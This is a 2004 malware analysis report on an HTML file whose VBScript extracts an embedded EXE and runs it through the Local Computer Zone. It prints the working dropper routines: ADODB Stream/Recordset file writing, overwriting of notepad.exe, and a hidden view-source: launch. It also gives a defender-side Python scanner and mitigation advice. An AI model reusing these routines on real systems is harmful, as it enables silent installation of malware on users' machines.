SIG^2 Secure Code Study Report

HTML files in Local Computer Zone

by Tan Chew Keong
11 March 2004

Introduction

Users are normally aware of the risk associated with opening unknown EXE, COM, SCR or PIF files that might contain Trojan horses. However, users usually assume that HTML files cannot harm their systems and are safe to open. In this report, we analyse an HTML file containing malicious VBScript that extracts and executes a malicious EXE when opened in the Local Computer Zone.

Analysis

The innocent-looking HTML file contains a malicious EXE file embedded as hex values in a VBScript array. The start of this array is shown below.

<script language="vbscript">
' Each element holds 37 comma-separated hex bytes of the embedded EXE.
' v(0) starts with 4D 5A ("MZ"), the DOS/PE executable signature, and
' v(1)-v(2) carry the usual "This program cannot be run in DOS mode" stub.
Dim v(133)

v(0)="4D,5A,90,00,03,00,00,00,04,00,00,00,FF,FF,00,00,B8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,00,00,00,00,00,00"
v(1)="00,00,00,00,00,00,00,00,00,00,08,01,00,00,0E,1F,BA,0E,00,B4,09,CD,21,B8,01,4C,CD,21,63,61,6E,6E,6F,74,20,62,65"
v(2)="20,72,75,6E,20,69,6E,20,44,4F,53,20,6D,6F,64,65,2E,0D,0D,0A,24,00,00,00,00,00,00,00,1B,57,DD,FC,07,5B,DD,86,1B"
v(3)="57,DD,94,13,0A,DD,85,1B,57,DD,04,13,0A,DD,85,1B,57,DD,04,07,59,DD,86,1B,57,DD,E8,04,DD,FE,3A,5C,DD,84,1B,57,DD"
v(4)="FE,3A,53,DD,84,1B,57,DD,87,1B,56,DD,F4,1B,57,DD,81,38,5C,DD,84,1B,57,DD,40,1D,51,DD,00,00,00,00,00,00,00,00,00"
v(5)="00,00,00,00,00,00,00,00,00,00,00,00,00,00,50,45,00,00,4C,01,03,00,04,B1,45,3F,00,00,00,00,10,00,00,00,10,00,00"
v(6)="00,50,00,00,40,69,00,00,00,60,00,00,00,70,00,00,00,00,40,00,00,10,00,00,00,02,00,00,00,00,00,00,80,00,00,00,10"
v(7)="00,00,00,00,00,00,02,00,00,00,00,00,10,00,00,10,00,00,00,00,10,00,00,10,00,00,00,00,00,A8,78,00,00,F8,00,00,00"
v(8)="00,70,00,00,A8,08,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"

OTHER LINES REMOVED


A default installation of Internet Explorer allows the ADODB.Stream and ADODB.Recordset ActiveX controls to be instantiated in the Local Computer Zone without prompting the user. The malicious HTML file uses these two controls to write the embedded EXE out to the local disk. It contains two VBScript routines, convToBinary and saveFile. The convToBinary function converts a VBScript string into a binary array that the ADODB.Stream control accepts. The saveFile routine takes a filename and a binary array as input, creates a binary-mode ADODB.Stream and writes the contents of the array out to disk. Both routines are shown below.

' Converts a VBScript (byte) string into a binary Variant array that
' ADODB.Stream.Write accepts. The Recordset is used only as a
' string-to-byte-array converter; no database is involved.
Function convToBinary(inData)
  Dim rs, lenInData

  Set rs = CreateObject("ADODB.Recordset")
  lenInData = LenB(inData)

  If lenInData > 0 Then
    rs.Fields.Append "temp", 205, lenInData   ' 205 = adLongVarBinary
    rs.Open
    rs.AddNew
    rs.Fields("temp").AppendChunk(inData)      ' store the raw bytes
    rs.Update
    convToBinary = rs("temp").GetChunk(lenInData)   ' read them back as a byte array
  End If
End Function

' Writes the binary array to disk. Type 1 = adTypeBinary; the SaveToFile
' option 2 = adSaveCreateOverWrite, so an existing file at FileName is
' silently replaced.
Sub saveFile(FileName, ByteArray)
  Dim bs
  Set bs = CreateObject("ADODB.Stream")

  bs.Type = 1
  bs.Open
  bs.Write ByteArray

  bs.SaveToFile FileName, 2
End Sub


The code used to extract the EXE file and write it out to disk is shown below. This code processes the array containing the malicious EXE (v) by splitting each element into its individual hex values and recombining them into a byte string. The byte string is passed to convToBinary to obtain a binary array, which is then written to disk using saveFile. Note that notepad.exe in both c:\windows\system32\ and c:\winnt\system32\ is overwritten with the malicious EXE.

Lastly, the document.write statement uses the view-source: protocol to invoke notepad.exe, which has already been overwritten with the malicious EXE.

on error resume next               ' suppress any error so the drop goes unnoticed
Dim y
' s holds the byte string reassembled from the v array (loop not shown).
y = convToBinary(s)
' Overwrite notepad.exe on both common Windows install paths.
saveFile "c:\windows\system32\notepad.exe", y
saveFile "c:\winnt\system32\notepad.exe", y
' view-source: opens the named file in the registered viewer, notepad.exe,
' which is now the dropped EXE. The 1x1 image keeps this invisible.
document.write("<img src=""view-source:file://c:/winnt/system32/SQLSRDME.TXT"" width=1 height=1>")
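As an added, defender-side example (not part of the original report): a small Python scanner that pulls the v(n) hex arrays out of an HTML file, rebuilds the embedded bytes, and checks for the MZ signature alongside the ADODB.Stream/Recordset, SaveToFile and view-source: indicators described above. The sample HTML is constructed for the demonstration and is not the analysed file.

```python
import re

# Constructed sample (not the real dropper): an MZ header fragment in the
# same v(n) layout, followed by the ADODB calls the report describes.
SAMPLE_HTML = r'''<html><script language="vbscript">
Dim v(1)
v(0)="4D,5A,90,00,03,00,00,00,04,00,00,00,FF,FF,00,00"
v(1)="B8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,00"
Set rs = CreateObject("ADODB.Recordset")
Set bs = CreateObject("ADODB.Stream")
bs.SaveToFile "c:\windows\system32\notepad.exe", 2
document.write("<img src=""view-source:file://c:/winnt/system32/readme.txt"">")
</script></html>'''

# v(n)="HH,HH,..." assignments that carry the embedded file.
HEX_ARRAY_RE = re.compile(r'\bv\((\d+)\)\s*=\s*"([0-9A-Fa-f]{2}(?:,[0-9A-Fa-f]{2})*)"')

# Indicators taken from the report: the two ADODB controls (by ProgID, or by
# the ADODB.Stream CLSID given in the Mitigation section), SaveToFile, and the
# view-source: trick used to launch the overwritten notepad.exe.
INDICATORS = {
    "ADODB.Stream": re.compile(r'"ADODB\.Stream"|00000566-0000-0010-8000-00AA006D2EA4', re.I),
    "ADODB.Recordset": re.compile(r'"ADODB\.Recordset"', re.I),
    "SaveToFile": re.compile(r'\.SaveToFile\b', re.I),
    "view-source": re.compile(r'view-source:', re.I),
}

def extract_embedded_bytes(html):
    """Reassemble the byte string the dropper builds from its v(n) arrays."""
    chunks = sorted((int(idx), hx) for idx, hx in HEX_ARRAY_RE.findall(html))
    return b"".join(bytes.fromhex(hx.replace(",", "")) for _, hx in chunks)

def scan_html(html):
    """Return the indicators found plus a verdict for one HTML file."""
    payload = extract_embedded_bytes(html)
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    if payload[:2] == b"MZ":          # DOS/PE executable signature
        hits.append("embedded MZ header")
    if "embedded MZ header" in hits and "SaveToFile" in hits:
        verdict = "dropper"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits, "embedded_bytes": len(payload)}

if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
```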


Mitigation

Users should be reminded to be vigilant even when opening innocent-looking HTML files. They should also avoid using their systems as Administrator, which prevents notepad.exe from being overwritten. In addition, the kill-bit should be set for the ADODB.Stream ActiveX control to prevent malicious HTML files from misusing it. Setting the kill-bit stops IE from activating the control and so stops the above malicious HTML from running correctly.

The CLSID of this ActiveX control is {00000566-0000-0010-8000-00AA006D2EA4}.

Information on setting the kill-bit can be found in Microsoft Knowledge Base Article 240797.


Conclusion

In this report, we have seen that opening a malicious HTML file in the Local Computer Zone can be dangerous: scripts within the HTML file can extract an embedded malicious EXE and execute it. Ways of mitigating this risk have been suggested above.

Contacts

For further enquiries, or to submit malicious code for our analysis, email the following.

Overall-in-charge: Tan Chew Keong


Updated: 11/3/2004
webmaster@security.org.sg